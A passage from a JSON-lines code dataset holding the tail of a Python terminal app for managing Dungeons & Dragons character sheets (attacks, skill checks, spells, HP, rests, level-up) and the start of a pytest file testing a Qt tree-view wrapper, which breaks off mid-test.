NAME', 'CHARACTER NAME', 'AGE', 'HEIGHT', 'WEIGHT',\n 'EYES COLOR', 'SKIN COLOR', 'HAIR COLOR', 'HISTORY'\n ]\n\n end = False\n while not end:\n answer = select(\n options=options,\n prompt='Select what to edit in your personal info.',\n single_item=True,\n )\n\n if answer == 'PLAYER NAME':\n character.general_info[\"PLAYER'S NAME\"] = get_player_name()\n elif answer == 'CHARACTER NAME':\n parent_folder = get_parent()\n sheets_folder = parent_folder.joinpath('Files/Sheets')\n sheet_file = sheets_folder.joinpath(\n character.general_info[\"NAME\"] + '.txt'\n )\n delete_sheet(sheet_file)\n new_name = get_name()\n character.general_info[\"NAME\"] = new_name\n character.personal_info[\"CHARACTER'S NAME\"] = new_name\n save_sheet(character)\n elif answer == 'AGE':\n character.personal_info['AGE'] = get_age(\n character.backup['RACE'])\n elif answer == 'HEIGHT':\n character.personal_info['HEIGHT'] = get_height(\n character.backup['RACE'])\n elif answer == 'WEIGHT':\n character.personal_info['WEIGHT'] = get_weight()\n elif answer == 'EYES COLOR':\n character.personal_info['EYE'] = get_eye_color()\n elif answer == 'SKIN COLOR':\n character.personal_info['SKIN'] = get_skin_color()\n elif answer == 'HAIR COLOR':\n character.personal_info['HAIR'] = get_hair_color()\n elif answer == 'HISTORY':\n character.personal_info['HISTORY'] = get_history()\n else:\n end = True\n\n if answer == 'EXIT':\n to_edit = 'GO BACK'\n\n clear_terminal()\n\n return True\n\n\ndef get_extra_modifier():\n answer = select(\n options=['YES', 'NO'],\n prompt='Besides the ability modifier and '\n 'proficiency, is there any other modifier that'\n 'you must add in this roll?',\n single_item=True,\n go_back=False,\n )\n\n if answer == 'YES':\n modifier = get_a_number(\n prompt='Type the modifier.',\n go_back_message=False\n )\n elif answer == 'NO':\n modifier = 0\n else:\n return answer\n\n return modifier\n\n\ndef get_dis_advantage():\n answer = select(\n options=['ADVANTAGE', 'DISADVANTAGE', 'NO'],\n prompt='Are you in advantage or disadvantage in this roll?',\n single_item=True,\n go_back=False,\n )\n\n if answer in ['ADVANTAGE', 'DISADVANTAGE']:\n if answer == 'ADVANTAGE':\n choose_number = '>'\n else: # answer == 'DISADVANTAGE'\n choose_number = '<'\n elif answer == 'NO':\n choose_number = None\n else:\n return answer\n\n return choose_number\n\n\ndef get_info_about_roll(config_key, extra_modifier, dis_advantage):\n choose_number = None\n modifier = 0\n\n if config[config_key] == 'ASK':\n\n if extra_modifier is True:\n modifier = get_extra_modifier()\n if modifier == 'EXIT':\n return modifier\n\n if dis_advantage is True:\n choose_number = get_dis_advantage()\n if choose_number == 'EXIT':\n return choose_number\n\n return choose_number, modifier\n\n\ndef weapon_attack(character):\n clear_terminal()\n\n str_modifier = character.abilities.score('STR')\n dex_modifier = character.abilities.score('DEX')\n\n options = {}\n for weapon in character.equipments['WEAPONS']:\n options[f'{weapon.name.title()}'] = weapon\n\n while True:\n weapon = select(\n options=options,\n prompt='Select a weapon:',\n show_type='key',\n return_type='value',\n single_item=True\n )\n\n if weapon != 'GO BACK' and weapon != 'EXIT':\n original_damage_dice = Dice(\n number=weapon.damage.number,\n maximum=weapon.damage.max,\n )\n\n ability_modifier = None\n\n if weapon.name in character.proficiencies['WEAPONS']:\n proficiency = character.proficiencies['VALUE']\n else:\n proficiency = 0\n\n if 'FINESSE' in weapon.properties:\n if dex_modifier > str_modifier:\n ability_modifier = dex_modifier\n else:\n ability_modifier = str_modifier\n\n elif 'THROWN' in weapon.properties:\n if config['ATTACK ALWAYS'] == 'ASK':\n answer = select(\n options=['THROW', 'DON\\'T THROW'],\n prompt='This weapon can be thrown. Would you like to?',\n single_item=True,\n go_back=False\n )\n\n if answer == 'THROW':\n ability_modifier = dex_modifier\n elif answer == 'DON\\'T THROW':\n ability_modifier = str_modifier\n elif answer == 'EXIT':\n return answer\n\n else: # config['ATTACK ALWAYS'] == 'NO'\n ability_modifier = str_modifier\n\n else:\n for classifications in index['EQUIPMENT']['WEAPON'].values():\n for classification, items in classifications.items():\n for weapon_in_index in items.values():\n if weapon_in_index.name == weapon.name:\n if classification == 'MELEE':\n ability_modifier = str_modifier\n else: # classification == 'RANGED'\n ability_modifier = dex_modifier\n\n if ability_modifier is None:\n raise Exception('Value of ability_modifier is None!')\n\n choose_number, modifier = get_info_about_roll(\n config_key='ATTACK ALWAYS',\n extra_modifier=True,\n dis_advantage=True\n )\n\n d20 = Dice()\n d20_string = convert_dice_to_d_format(d20)\n damage_dice = convert_dice_to_d_format(weapon.damage)\n damage_dice = damage_dice[1:]\n\n print(f'You selected {weapon.name.title()}')\n print(f'Your attack is {d20_string}; The damage is a {damage_dice}')\n print('Press ENTER to roll your attack...')\n input()\n\n damage_modifier = ability_modifier\n attack_modifier = ability_modifier + proficiency + modifier\n\n if choose_number:\n if choose_number == '>':\n result = d20.roll(advantage=True)\n else: # choose_number == '<'\n result = d20.roll(disadvantage=True)\n else:\n result = d20.roll()\n\n if result == 20:\n print('Which is a CRITICAL SUCCESS!')\n weapon.damage.number = 2\n\n elif result == 1:\n print('Which is a failure regardless of any modifier!')\n weapon.damage.number = 0\n\n if result != 1:\n result += attack_modifier\n print(f'You have a modifier total of {attack_modifier}, making '\n f'your total attack of {result}!')\n print('')\n\n damage = weapon.damage.roll()\n if damage > 0:\n damage += damage_modifier\n print(\n f\"If you succeed in your attack, \"\n f\"you've done a damage of {damage}!\"\n )\n\n print('Press ENTER to continue')\n input()\n\n weapon.damage = original_damage_dice\n\n elif weapon == 'GO BACK' or weapon == 'EXIT':\n return weapon\n\n\ndef skill_check(character):\n while True:\n skill = select(\n options=index['SKILLS'],\n prompt='Select what skill you want to perform the check.',\n show_type='key',\n return_type='key',\n single_item=True\n )\n\n if skill in ['EXIT', 'GO BACK']:\n return skill\n else:\n choose_number, modifier = get_info_about_roll(\n config_key='SKILL CHECK ALWAYS',\n extra_modifier=False,\n dis_advantage=True,\n )\n\n ability = index['SKILLS'][skill]\n ability_modifier = character.abilities.score(ability)\n\n proficiency = 0\n if skill in character.proficiencies['SKILLS']:\n proficiency = character.proficiencies['VALUE']\n\n clear_terminal()\n print(f'You have selected {skill}.')\n print(f'{skill} is associated to {ability}.')\n if proficiency:\n print('You are proficient in this skill!')\n print('')\n\n print(f'Your ability modifier is {ability_modifier}.')\n if proficiency:\n print(f'Your proficiency is {proficiency}')\n print('')\n\n print('Press ENTER to roll your die...')\n input()\n\n d20 = Dice()\n\n if choose_number == '>':\n value = d20.roll(advantage=True)\n elif choose_number == '<':\n value = d20.roll(disadvantage=True)\n else: # No advantage, nor disadvantage\n value = d20.roll()\n\n total_modifier = ability_modifier + proficiency + modifier\n total_value = total_modifier + value\n\n print(f'You rolled {value}.')\n print(\n f'With a total modifier of {total_modifier}, '\n f'you rolled {total_value}.'\n )\n print('')\n\n print('Press ENTER to go back...')\n input()\n\n\ndef use_magic(character):\n clear_terminal()\n check_spells(character)\n\n if character.magical_ability.has_magic is not None:\n loop = True\n while loop:\n if character.magical_ability.slots_spent \\\n != character.magical_ability.spell_slots:\n prompt = 'You still have slots to spend.\\n\\n'\n\n options = []\n for lvl, slots in character.magical_ability.spell_slots.items():\n slots_spent = character.magical_ability.slots_spent[lvl]\n available_slots = slots - slots_spent\n\n if available_slots > 0:\n options.append(str(lvl))\n prompt += f'You have {available_slots} ' \\\n f'slots of level {lvl} to spend.\\n'\n prompt += '\\nSelect the spell slot you want to spend.'\n\n show_spells(\n character=character,\n enter_continue=False,\n show_empty=False,\n )\n\n print_name('-')\n print('')\n\n answer = select(\n options=options,\n prompt=prompt,\n single_item=True,\n clean=False\n )\n\n if answer == 'GO BACK':\n return answer\n elif answer == 'EXIT':\n return answer\n else:\n answer = int(answer)\n character.magical_ability.slots_spent[answer] += 1\n else:\n print('It appears you already spent all available slots!')\n print('Try to take a rest to make them available again.')\n print('Press ENTER to GO BACK...')\n input()\n\n return None\n\n clear_terminal()\n else:\n print('Your character has no access to magic.')\n input()\n\n clear_terminal()\n\n return None\n\n\ndef equip_armor(character):\n loop = True\n while loop:\n armors = {}\n for armor in character.equipments['ARMORS']:\n if armor == character.equipments['ARMOR EQUIPPED']:\n pass\n elif character.equipments[\n 'SHIELD EQUIPPED'] and armor.name == 'SHIELD':\n pass\n else:\n armors[armor.name] = armor\n\n if character.equipments['ARMOR EQUIPPED']:\n armors['REMOVE ARMOR'] = 'REMOVE ARMOR'\n\n armor_equipped = character.equipments['ARMOR EQUIPPED']\n text = f'You are wearing a {armor_equipped.name.title()} ' \\\n f'armor - {armor_equipped.armor_type.title()}.\\n'\n text += f'Its Armor Class is of {armor_equipped.armor_class}.\\n'\n\n if armor_equipped.strength:\n text += f'To wear it, you must have a Strength of value ' \\\n f'{armor_equipped.strength}.\\n'\n\n if armor_equipped.dex_max:\n text += 'Your maximum dexterity modifier given by this armor ' \\\n f'is of {armor_equipped.dex_max}.\\n'\n\n if armor_equipped.stealth_disadvantage:\n text += 'It also gives you disadvantage in stealth checks!\\n'\n else:\n text = 'You are currently not wearing any armor.\\n'\n\n if character.equipments['SHIELD EQUIPPED']:\n armors['REMOVE SHIELD'] = 'REMOVE SHIELD'\n\n text += '\\nYou are also wearing a shield!\\n'\n text += 'The shield adds 2 to your general Armor Class.\\n'\n\n text += '\\nSelect an armor to equip in your character.\\n'\n text += 'Be aware that, doing that, you will be replacing your ' \\\n 'current armor, if there is one\\n'\n\n answer = select(\n options=armors,\n prompt=text,\n show_type='key',\n return_type='value',\n single_item=True\n )\n\n if answer not in ['GO BACK', 'EXIT']:\n if answer == 'REMOVE ARMOR':\n character.equipments['ARMOR EQUIPPED'] = []\n\n elif answer == 'REMOVE SHIELD':\n character.equipments['SHIELD EQUIPPED'] = False\n\n elif answer.name == 'SHIELD':\n character.equipments['SHIELD EQUIPPED'] = True\n\n else:\n character.equipments['ARMOR EQUIPPED'] = answer\n\n clear_terminal()\n character.general_stats['AC'] = 10 \\\n + character.abilities.score('DEX')\n\n if character.equipments['SHIELD EQUIPPED'] is True:\n character.general_stats['AC'] += shield.armor_class\n\n if character.equipments['ARMOR EQUIPPED']:\n equipped_armor = character.equipments['ARMOR EQUIPPED']\n character.general_stats['AC'] += equipped_armor.armor_class\n\n clear_terminal()\n\n save_sheet(character)\n\n elif answer == 'GO BACK':\n loop = False\n elif answer == 'EXIT':\n return 'EXIT'\n\n return None\n\n\ndef rest(character):\n answer = select(\n options=['LONG REST', 'SHORT REST'],\n prompt='What kind of rest would you like to take?',\n single_item=True\n )\n\n if answer == 'LONG REST':\n if character.magical_ability.has_magic:\n for level in character.magical_ability.slots_spent.keys():\n character.magical_ability.slots_spent[level] = 0\n\n if character.magical_ability.prepare_spells:\n choice = select(\n options=['YES', 'NO'],\n prompt='Would you like to change your prepared spells?',\n single_item=True,\n go_back=False,\n finish=False\n )\n\n if choice == 'YES':\n prepare_spells(character, finish=False)\n\n character.general_stats['CURRENT HP'] = \\\n character.general_stats['MAXIMUM HP'] \\\n + character.general_stats['TEMPORARY HP']\n character.general_stats['USED HIT DICE'] = 0\n\n elif answer == 'SHORT REST':\n if character.general_stats['CURRENT HP'] \\\n < character.general_stats['MAXIMUM HP'] \\\n + character.general_stats['TEMPORARY HP']:\n if character.general_stats['USED HIT DICE'] \\\n < character.general_info['LEVEL']:\n # MULTICLASS\n number = character.general_stats['HIT DICE'].max\n options = {}\n for level in range(\n character.general_info['LEVEL']\n - character.general_stats['USED HIT DICE']\n ):\n dice = Dice(level + 1, number)\n options[convert_dice_to_d_format(dice)] = dice\n\n answer = select(\n options=options,\n prompt='You can use an certain amount of hit dice to '\n 'recover your Health Points.',\n show_type='key',\n return_type='value',\n single_item=True\n )\n\n if answer == 'GO BACK' or answer == 'EXIT':\n return answer\n else:\n clear_terminal()\n if config['DICE ROLL'] == 'VIRTUAL':\n recovered_hp = answer.roll(\n modifier=character.abilities.score('CON')\n )\n print(f'You rolled {recovered_hp}!')\n print('Press ENTER to continue...')\n input()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n recovered_hp = get_typed_dice(\n dice=answer,\n objective='define your recovered HP.'\n )\n recovered_hp += character.abilities.score('CON')\n\n if character.general_stats['CURRENT HP'] \\\n + recovered_hp \\\n > character.general_stats['MAXIMUM HP'] \\\n + character.general_stats['TEMPORARY HP']:\n character.general_stats['CURRENT HP'] = \\\n character.general_stats['MAXIMUM HP'] \\\n + character.general_stats['TEMPORARY HP']\n else:\n character.general_stats['CURRENT HP'] += recovered_hp\n\n print('You have now '\n f'{character.general_stats[\"CURRENT HP\"]} HP.')\n print('Press ENTER to continue...')\n input()\n\n character.general_stats['USED HIT DICE'] += answer.number\n\n elif answer == 'EXIT':\n return answer\n\n save_sheet(character)\n return None\n\n\ndef death_check(character):\n d20 = Dice()\n\n end = False\n while not end:\n clear_terminal()\n\n print('Oh, no! It appears your character has a negative HP!')\n print('According to the rules, you must succeed in three death '\n 'saving throws.\\n')\n\n print('You already have:')\n print(f'- {character.checks_succeeded} successful checks.')\n print(f'- {character.checks_failed} failed checks.\\n')\n\n print('Press ENTER to do another check.')\n input()\n\n if config['DICE ROLL'] == 'VIRTUAL':\n result = d20.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n result = get_typed_dice(\n dice=d20,\n objective='make another saving throw against death.'\n )\n\n print(f'You have rolled a {result}.')\n\n if result == 1:\n print('It is a critical failure! It counts twice.')\n character.checks_failed += 2\n elif result < 10:\n print('It is a failure!')\n character.checks_failed += 1\n elif result < 20:\n print('It is a success!')\n character.checks_succeeded += 1\n else: # result == 20\n print('It is a critical success!')\n character.checks_succeeded += 2\n\n if character.checks_succeeded >= 3 \\\n or character.checks_failed >= 3:\n end = True\n\n if character.checks_succeeded >= 3:\n character.general_stats['CURRENT HP'] = 0\n character.checks_failed = 0\n character.checks_succeeded = 0\n print('')\n print('You have now 3 successes. You have now 0 HP')\n else: # character.checks_failures >= 3\n character.dead = True\n print('')\n print('You have now 3 failures.')\n print('Unfortunately, you died.')\n\n\ndef modify_hp(character):\n loop = True\n while loop:\n answer = select(\n options=[\n 'TAKE DAMAGE', 'RECOVER HP',\n 'REMOVE TEMPORARY HP', 'ADD TEMPORARY HP',\n ],\n prompt='Current HP/Temporary HP/Maximum HP: '\n f'{character.general_stats[\"CURRENT HP\"]}/'\n f'{character.general_stats[\"TEMPORARY HP\"]}/'\n f'{character.general_stats[\"MAXIMUM HP\"]}\\n\\n'\n 'You have a few options to modify '\n 'your HP. Choose the adequate.',\n single_item=True\n )\n\n if answer == 'EXIT':\n return answer\n\n elif answer == 'GO BACK':\n loop = False\n\n elif answer == 'TAKE DAMAGE':\n damage = get_a_number('Type the number of damage taken.')\n\n if damage is not None:\n character.general_stats['CURRENT HP'] -= damage\n\n elif answer == 'RECOVER HP':\n recovered = get_a_number(\n 'Type the number of HP recovered.\\n'\n \"If want to go back, just type anything that's not a number.\"\n )\n\n if recovered is not None:\n if character.general_stats['CURRENT HP'] + recovered \\\n <= character.general_stats['MAXIMUM HP'] \\\n + character.general_stats['TEMPORARY HP']:\n character.general_stats['CURRENT HP'] += recovered\n else:\n character.general_stats['CURRENT HP'] = \\\n character.general_stats['MAXIMUM HP'] \\\n + character.general_stats['TEMPORARY HP']\n\n elif answer == 'ADD TEMPORARY HP':\n temporary = get_a_number(\n f'Your current temporary HP is '\n f'{character.general_stats[\"TEMPORARY HP\"]}\\n\\n'\n 'Type the number of added temporary HP.'\n )\n\n if temporary is not None:\n character.general_stats['TEMPORARY HP'] += temporary\n\n elif answer == 'REMOVE TEMPORARY HP':\n temporary = get_a_number(\n 'Your current temporary HP is of '\n f'{character.general_stats[\"TEMPORARY HP\"]}\\n\\n'\n 'Type the number of removed temporary HP.'\n )\n\n if temporary is not None:\n character.general_stats['TEMPORARY HP'] -= temporary\n\n if character.general_stats['CURRENT HP'] \\\n + character.general_stats['TEMPORARY HP'] \\\n <= -character.general_stats['MAXIMUM HP']:\n print('You died!')\n print('The exceeding damage is bigger than your maximum HP.')\n print('Press ENTER to continue...')\n input()\n\n elif character.general_stats['CURRENT HP'] \\\n + character.general_stats['TEMPORARY HP'] \\\n <= 0:\n character.checks_failed = 0\n character.checks_succeeded = 0\n\n death_check(character)\n\n elif character.general_stats['CURRENT HP'] \\\n + character.general_stats['TEMPORARY HP'] \\\n == 0:\n clear_terminal()\n print('Your HP reached 0. You fall unconscious!')\n print('Press ENTER to continue...')\n input()\n clear_terminal()\n\n return None\n\n\ndef modify_equipment(character):\n new_equipment, new_wealth = buy_equipment(\n starting_wealth=character.wealth,\n fixed_price=False\n )\n\n if new_equipment is None:\n return 'EXIT'\n\n new_equipment = group_equipment(new_equipment)\n\n for category, equipments in new_equipment.items():\n character.equipments[category] += equipments\n\n character.wealth = new_wealth\n\n return None\n\n\ndef add_xp(character):\n new_xp = get_a_number('Type the number of new XP')\n\n if new_xp is not None:\n character.general_info['XP'] += new_xp\n\n while level_up(character):\n pass\n\n\ndef roll_dice():\n dice = None\n while dice != '':\n print('Type the dice you want to roll.')\n print('Formats accepted: [1d4, 1D4, 1d4+1, 1d4 + 1, 1d4-1, 1D4 - 1].')\n print('Type nothing to go back.')\n dice = input()\n print('')\n\n if dice != '':\n dice, modifier = convert_string_to_die(dice)\n\n if dice is not None:\n print('Your dice are valid! Press ENTER to roll them.')\n input()\n\n value = dice.roll(modifier)\n print(f'You rolled {value}!')\n print('Press ENTER to roll another dice.')\n input()\n else:\n print('What you typed is not accepted. Please, try again.')\n print('Press ENTER to continue...')\n input()\n\n clear_terminal()\n\n\ndef play(character):\n answer = None\n what_to_do = [\n 'ROLL DICE',\n 'EQUIP ARMOR',\n 'MODIFY EQUIPMENT',\n 'MODIFY HP',\n 'CAST A SPELL',\n 'MAKE AN ATTACK',\n 'MAKE A SKILL CHECK',\n 'ADD XP',\n 'TAKE A REST',\n ]\n\n while answer != 'GO BACK':\n answer = select(\n options=what_to_do,\n prompt='You are in the play mode. What you want to do?',\n single_item=True,\n finish=False\n )\n\n result = None\n if answer == 'EQUIP ARMOR':\n result = equip_armor(character)\n\n elif answer == 'TAKE A REST':\n result = rest(character)\n\n elif answer == 'MODIFY HP':\n result = modify_hp(character)\n\n elif answer == 'MODIFY EQUIPMENT':\n result = modify_equipment(character)\n\n elif answer == 'ROLL DICE':\n roll_dice()\n\n elif answer == 'CAST A SPELL':\n result = use_magic(character)\n\n elif answer == 'ADD XP':\n add_xp(character)\n\n elif answer == 'MAKE AN ATTACK':\n result = weapon_attack(character)\n\n elif answer == 'MAKE A SKILL CHECK':\n result = skill_check(character)\n\n if result == 'EXIT':\n answer = 'GO BACK'\n\n\ndef open_sheet(sheet):\n options = [\n 'SEE SHEET', 'EDIT SHEET', 'PLAY WITH SHEET', 'DELETE SHEET'\n ]\n end = False\n\n with open(sheet, 'rb') as file_object:\n character = pickle.load(file_object)\n\n while not end:\n choice = select(\n options=options,\n prompt='What you want to do?',\n single_item=True,\n go_back=False,\n )\n sheet = Path(sheet)\n\n if choice == 'SEE SHEET':\n show_character(character)\n elif choice == 'EDIT SHEET':\n succeeded = edit_character(character)\n\n if succeeded is True:\n save_sheet(character)\n elif choice == 'PLAY WITH SHEET':\n play(character)\n save_sheet(character)\n elif choice == 'DELETE SHEET':\n delete_sheet(sheet)\n end = True\n else:\n end = True\n\n clear_terminal()\n\n\ndef create_new_sheet(character):\n \"\"\"\n Stores the character object in a file and adds its info to the index\n :param character: object of the class character\n :return: boolean if the sheet was created successfully or not\n \"\"\"\n cancel = False\n folder = get_parent().joinpath('Files/Sheets')\n new_path = folder.joinpath(\n character.personal_info[\"CHARACTER'S NAME\"] + '.txt'\n )\n\n while new_path.exists() and not cancel:\n options_text = [\n 'RENAME CHARACTER',\n 'OVERWRITE SHEET',\n 'CANCEL NEW CHARACTER'\n ]\n answer = select(\n options=options_text,\n prompt='It looks like a sheet with this name already exists.',\n single_item=True\n )\n\n if answer == 'RENAME CHARACTER':\n character.personal_info[\"CHARACTER'S NAME\"] = get_name()\n new_path = folder.joinpath(\n character.personal_info[\"CHARACTER'S NAME\"] + '.txt'\n )\n elif answer == 'OVERWRITE SHEET':\n delete_sheet(new_path)\n elif answer == 'CANCEL NEW CHARACTER':\n cancel = True\n\n clear_terminal()\n\n if not cancel:\n save_sheet(character)\n return True\n else:\n return False\n\n\ndef get_config_value():\n config_folder = get_parent().joinpath('Files')\n config_file = config_folder.joinpath('config.txt')\n\n if config_file.exists():\n if os.path.getsize(config_file) > 0:\n with open(config_file, 'rb') as config_txt:\n value = pickle.load(config_txt)\n else:\n raise Exception('File config.txt empty!')\n\n for configuration, status in config.items():\n if configuration not in value.keys():\n value[configuration] = status\n\n return value\n\n\ndef routine_preparation():\n check_files()\n global config\n config = get_config_value()\n columns, lines = os.get_terminal_size()\n\n while columns != 80:\n print(\n 'Please set your window for the width of 80 and then press '\n 'ENTER to continue'\n )\n input()\n\n columns, lines = os.get_terminal_size()\n\n clear_terminal()\n\n\ndef level_up(character):\n if character.general_info['XP'] >= character.xp_by_level[\n character.general_info['LEVEL'] + 1]:\n character.general_info['LEVEL'] += 1\n\n if character.general_info['LEVEL'] in [4, 8, 12, 16, 19]:\n answer = None\n\n added_points = {\n 'STR': 0,\n 'DEX': 0,\n 'CON': 0,\n 'INT': 0,\n 'WIS': 0,\n 'CHA': 0\n }\n\n points_to_increase = 2\n while answer != 'CONFIRM':\n prompt = f'You have {points_to_increase} points ' \\\n f'to add in abilities'\n\n options = {}\n if points_to_increase > 0:\n for ability, score in character.abilities.values.items():\n if score < 20:\n long_ability = index['ABILITIES'][ability]\n key = f'{long_ability.title()}: ' \\\n f'{score + added_points[ability]}'\n options[key] = ability\n\n if points_to_increase == 0:\n options['Confirm new values'] = 'CONFIRM'\n options['Restart values to original'] = 'RESTART'\n\n answer = select(\n options=options,\n prompt=prompt,\n show_type='key',\n return_type='value',\n single_item=True,\n )\n\n if answer != 'RESTART' and answer != 'CONFIRM':\n added_points[answer] += 1\n points_to_increase -= 1\n elif answer == 'RESTART':\n points_to_increase = 2\n added_points = {\n 'STR': 0,\n 'DEX': 0,\n 'CON': 0,\n 'INT': 0,\n 'WIS': 0,\n 'CHA': 0\n }\n\n for ability, increase in added_points.items():\n character.abilities.increment_ability(ability, increase)\n\n con_modifier = character.abilities.score('CON')\n if config['DICE ROLL'] == 'VIRTUAL':\n hp_addition = character.general_stats['HIT DICE'].roll(con_modifier)\n else: # config['DICE ROLL'] == 'PHYSICAL'\n hp_addition = get_typed_dice(\n dice=character.general_stats['HIT DICE'],\n objective='define your HP addition.'\n )\n hp_addition += con_modifier\n\n character.general_stats['MAXIMUM HP'] += hp_addition\n character.general_stats['CURRENT HP'] += hp_addition\n character.general_stats['HIT DICE'].number += 1\n # MULTICLASS\n\n character.specialization['NAME'] = character.specialization_check(\n character.general_info['LEVEL'],\n character.specialization['LEVEL'],\n character.specialization['ALL FEATURES'],\n character.specialization['NAME'],\n )\n character.specialization['FEATURES'] = \\\n character.select_specialization_features(\n level=character.general_info['LEVEL'],\n specialization_level=character.specialization['LEVEL'],\n specializations_features=character.specialization[\n 'ALL FEATURES'],\n specialization=character.specialization['NAME']\n )\n\n specializations_w_magic = ['ELDRITCH KNIGHT', 'ARCANE TRICKSTER']\n if character.specialization['NAME'] in specializations_w_magic:\n character.magical_ability.has_magic = True\n\n if character.general_info['CLASS'] in ['PALADIN', 'RANGER']:\n if character.general_info['LEVEL'] >= 2:\n character.magical_ability.has_magic = True\n\n # if character.magical_ability.prepared_spell is True:\n\n character.proficiencies['VALUE'] = character.backup[\n 'CLASS'].proficiency_by_level[character.general_info['LEVEL']]\n\n character.features['CLASS'] += character.backup['CLASS'].all_features[\n character.general_info['LEVEL']\n ]\n try:\n character.features['SPECIALIZATION'] += character.specialization[\n 'ALL FEATURES'][character.general_info['LEVEL']]\n except KeyError:\n pass\n\n if character.magical_ability.has_magic is not None:\n character.magical_ability.cantrips_known += \\\n character.magical_ability.cantrips_by_level[\n character.general_info['LEVEL']\n ]\n\n character.magical_ability.spells_known += character. \\\n magical_ability.spells_by_level[character.general_info['LEVEL']]\n\n character.magical_ability.spell_slots = character.magical_ability. \\\n spell_slots_by_level[character.general_info['LEVEL']]\n\n race_magic(\n race_name=character.general_info['RACE'],\n level=character.general_info['LEVEL'],\n magical_ability=character.magical_ability\n )\n\n return True\n else:\n return False\n\n\ndef edit_configurations():\n global config\n\n possible_values = {\n 'DICE ROLL': ['VIRTUAL', 'PHYSICAL'],\n 'ROLLS ALWAYS': ['NO', 'ASK'],\n 'ATTACK ALWAYS': ['NO', 'ASK'],\n 'SKILL CHECK ALWAYS': ['NO', 'ASK']\n }\n\n selected = None\n while selected != 'EXIT':\n options = {}\n for configuration, status in config.items():\n options[configuration] = configuration \\\n + ' ' \\\n + '.' * (75 - (len(configuration) + 2 + len(status))) \\\n + ' ' \\\n + status\n\n selected = select(\n options=options,\n prompt='Select a configuration to edit it.\\n',\n show_type='value',\n return_type='key',\n single_item=True,\n go_back=False\n )\n\n if selected != 'EXIT':\n clear_terminal()\n\n new_config = select(\n options=possible_values[selected],\n prompt=f'What is {selected} new value?',\n single_item=True\n )\n\n if new_config == 'EXIT':\n selected = 'EXIT'\n elif new_config != 'GO BACK':\n if selected == 'ROLLS ALWAYS':\n config['ATTACK ALWAYS'] = new_config\n config['SKILL CHECK ALWAYS'] = new_config\n\n config[selected] = new_config\n\n files_folder = check_files().joinpath('Files')\n file = files_folder.joinpath('config.txt')\n with open(file, 'wb') as config_file:\n pickle.dump(config, config_file)\n\n\ndef menu():\n \"\"\"\n Creates a menu for the user to choose what he wants to do\n :return:\n \"\"\"\n routine_preparation()\n end = False\n\n while not end:\n choices = [\n 'NEW SHEET',\n 'OPEN SHEET',\n 'ROLL DICE',\n 'OPEN CONFIGURATIONS'\n ]\n choice = select(\n options=choices,\n prompt='Welcome to Character Sheets Manager!\\n',\n single_item=True,\n go_back=False\n )\n clear_terminal()\n\n if choice == 'NEW SHEET':\n character = create_new_character()\n\n if character is not None:\n create_new_sheet(character)\n\n elif choice == 'OPEN SHEET':\n sheet_path = show_sheets()\n\n while sheet_path != 'GO BACK':\n open_sheet(sheet_path)\n sheet_path = show_sheets()\n\n elif choice == 'ROLL DICE':\n roll_dice()\n\n elif choice == 'OPEN CONFIGURATIONS':\n edit_configurations()\n\n elif choice == 'EXIT':\n end = True\n","repo_name":"LucasCardoso910/Character-Sheet-Manager","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":144293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74426343825","text":"from __future__ import unicode_literals\n\nimport pytest\n\nfrom pyvmmonitor_qt.pytest_plugin import qtapi # @UnusedImport\nfrom pyvmmonitor_qt.qt.QtWidgets import QWidget\n\n\n@pytest.fixture\ndef tree():\n from pyvmmonitor_qt.qt.QtWidgets import QTreeView\n from pyvmmonitor_qt.tree.pythonic_tree_view import PythonicQTreeView\n tree = QTreeView()\n tree = PythonicQTreeView(tree)\n yield tree\n from pyvmmonitor_qt import qt_utils\n if qt_utils.is_qobject_alive(tree.tree):\n tree.tree.deleteLater()\n tree = None\n from pyvmmonitor_qt.qt_event_loop import process_events\n process_events(collect=True)\n\n\ndef test_tree_view(qtapi, tree):\n from pyvmmonitor_qt import qt_utils\n from pyvmmonitor_qt.tree.pythonic_tree_view import TreeNode\n\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n\n # Usual API to use\n tree['a'] = [10, 20]\n tree['a.b'] = [20, 30]\n tree['a.c'] = ['30']\n tree['a.b.c'] = ['30', 40]\n\n assert qt_utils.list_wiget_item_captions(tree.tree, cols=(0, 1)) == [\n ['10', '20'], ['+20', '+30'], ['++30', '++40'], ['+30', '+']]\n\n tree['a'].expand()\n tree['a'].check(True)\n\n node = TreeNode([1, 2])\n assert not node.is_expanded()\n with pytest.raises(RuntimeError):\n node.expand(True)\n assert not node.is_expanded() # We can only expand after it's added to the tree\n with pytest.raises(RuntimeError):\n node.check(True)\n assert not node.is_checked()\n\n tree['a.d'] = node\n node.expand()\n node.check()\n assert node.is_expanded()\n assert node.is_checked()\n tree['a.d.c'] = [2, 4]\n tree['a.d.c'].expand()\n assert tree['a.d.c'].is_expanded()\n\n assert node.is_expanded()\n assert node.is_checked()\n assert not node.is_checked(1)\n\n from pyvmmonitor_qt.qt_event_loop import process_events\n process_events()\n assert node.is_expanded()\n assert node.is_checked()\n assert not node.is_checked(1)\n\n\ndef test_iter_nodes(qtapi, tree):\n tree.tree.show()\n\n tree['a'] = 10\n tree['b'] = 20\n tree['a.b'] = 30\n tree['a.b.c'] = 40\n tree['a.b.d'] = 41\n\n contents = []\n for node in tree.iternodes('a'):\n contents.append(node.obj_id)\n\n assert '\\n'.join(sorted(contents)) == '''a.b\na.b.c\na.b.d'''\n\n del tree['a.b']\n\n assert len(list(tree.iternodes('a'))) == 0\n\n\ndef test_tree_view_expand_remove(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree['a'].expand()\n from pyvmmonitor_qt.qt_utils import count_items\n assert count_items(tree.tree) == 1\n del tree['a']\n assert count_items(tree.tree) == 0\n\n\ndef test_hierarchy_different_from_ids(qtapi, tree):\n tree.tree.show()\n\n tree.columns = ['col1', 'col2']\n qtapi.add_widget(tree.tree)\n tree['a'] = [10, 20]\n tree.add_node('a', 'a.b.c.d', [1, 2])\n\n contents = []\n for node in tree.iternodes('a'):\n contents.append(node.obj_id)\n assert ''.join(contents) == 'a.b.c.d'\n\n from pyvmmonitor_qt.qt_utils import count_items\n assert count_items(tree.tree) == 2\n assert len(tree) == 2\n del tree['a']\n assert 